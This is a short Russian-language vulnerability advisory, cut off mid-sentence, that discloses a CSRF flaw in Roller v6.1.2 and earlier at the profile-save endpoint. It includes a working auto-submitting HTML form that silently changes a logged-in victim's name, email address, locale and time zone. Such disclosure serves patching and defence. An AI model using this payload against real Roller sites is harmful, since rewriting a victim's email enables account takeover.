
В Roller v6.1.2 и более ранних версиях обнаружена уязвимость межсайтовой подделки запросов (CSRF) в конечной точке /roller/roller-ui/profile!save.rol.
Данная уязвимость позволяет злоумышленникам произвольно изменять информацию профиля пользователя-жертвы (например, адрес электронной почты, полное имя, локаль, часовой пояс) с помощью специально созданной HTML-страницы.
Уязвимость позволяет отправлять несанкционированные запросы к /roller/roller-ui/profile!save.rol, которые обновляют профиль пользователя без защиты CSRF.
<html>
<head>
<form id="exploitForm" action="http://localhost:8080/roller/roller-ui/profile!save.rol" method="POST">
<input name="bean.userName" value="vanlam" type="hidden">
<input name="bean.screenName" value="hacked" type="hidden">
<input name="bean.fullName" value="hacked" type="hidden">
<input name="bean.emailAddress" value="[email protected]" type="hidden">
<input name="bean.passwordText" value="" type="hidden">
<input name="bean.passwordConfirm" value="" type="hidden">
<input name="bean.locale" value="vi_VN" type="hidden">
<input name="bean.timeZone" value="Asia/Bangkok" type="hidden">
</form>
<script>
document.getElementById('exploitForm').submit();
</script>
</head>
</html>
bean.userName: vanlambean.screenName: hackedbean.fullName: hackedbean.emailAddress: [email protected]bean.passwordText: (пусто)bean.passwordConfirm: (пусто)bean.locale: vi_VNbean.timeZone: Asia/BangkokЗлоумышленник может создать вредоносную HTML-страницу, которая при посещении аутентифицированным пользователем Roller автоматически отправит форму для обновления информации профиля жертвы без её согласия. Это может привести к: